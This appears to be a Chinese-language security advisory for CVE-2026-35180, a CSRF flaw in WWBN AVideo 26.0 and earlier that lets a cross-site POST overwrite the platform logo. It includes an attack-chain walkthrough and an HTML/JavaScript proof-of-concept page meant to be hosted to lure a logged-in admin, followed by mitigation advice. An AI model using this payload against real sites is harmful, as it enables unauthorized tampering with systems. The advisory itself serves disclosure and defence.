CVE-2026-35180 CVSS 4.3 中危

CVE-2026-35180 AVideo跨站请求伪造漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35180

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及之前版本中，admin/customize_settings_nativeUpdate.json.php端点缺乏CSRF token验证，并且在执行ORM的域安全检查之前将上传的logo文件写入磁盘。结合SameSite=None的cookie策略，跨源POST请求可以用攻击者控制的内容覆盖平台的logo。

技术细节

该漏洞主要由CSRF防护缺失和文件上传处理逻辑顺序不当导致。首先，目标接口`admin/customize_settings_nativeUpdate.json.php`未实施CSRF令牌验证，无法区分请求是否由用户主观发起。其次，若服务端Cookie配置为SameSite=None，浏览器将允许跨站点请求携带Cookie，使得攻击者可以绕过同源策略进行伪造请求。最关键的技术缺陷在于代码执行顺序：系统先将用户上传的文件持久化写入磁盘，随后才执行ORM的域安全检查。这种逻辑漏洞导致攻击者可以利用受害者的管理员权限，在安全校验生效前上传恶意文件并覆盖服务器上的原始Logo，从而破坏网站完整性。

攻击链分析

STEP 1

侦察

攻击者确认目标网站使用的是WWBN AVideo 26.0或更早版本。

STEP 2

准备

攻击者构造一个恶意的HTML页面，包含针对`admin/customize_settings_nativeUpdate.json.php`端点的表单提交脚本，并准备一个恶意的Logo图片文件。

STEP 3

投递

攻击者诱导已登录管理员的受害者访问该恶意页面链接。

STEP 4

执行

受害者的浏览器在访问页面时，自动携带管理员Session Cookie（由于SameSite=None配置）向目标服务器发送POST请求。

STEP 5

利用

服务器接收请求，先将攻击者上传的文件写入磁盘覆盖原Logo，随后才进行安全检查（此时文件已被修改），导致网站Logo被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-35180
Description: This HTML page demonstrates a CSRF attack that attempts to overwrite the platform logo.
Usage: Host this file and trick an authenticated admin into visiting it.
-->
<html>
<body>
<script>
  function attack() {
    var url = "https://[TARGET_DOMAIN]/admin/customize_settings_nativeUpdate.json.php";
    var formData = new FormData();
    // The attacker's malicious logo file
    formData.append("logo", document.getElementById("fileInput").files[0]); 
    // Additional required parameters based on traffic analysis (example names)
    formData.append("submit", "Update"); 

    var xhr = new XMLHttpRequest();
    xhr.open("POST", url, true);
    // Browser automatically sends cookies if SameSite=None and Secure
    xhr.withCredentials = true; 
    xhr.onload = function () {
      console.log("Attack status:", xhr.status);
    };
    xhr.send(formData);
  }
</script>

<!-- Auto-submit trigger could be added here or via user interaction -->
<h3>CSRF PoC Demo</h3>
<input type="file" id="fileInput" value="malicious_logo.png">
<button onclick="attack()">Submit Request</button>
</body>
</html>

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议管理员立即升级至修复版本。若无法立即升级，应通过Web应用防火墙（WAF）拦截对`admin/customize_settings_nativeUpdate.json.php`的外部访问请求，并修改服务端Cookie配置，移除SameSite=None设置，以阻断跨站请求伪造攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表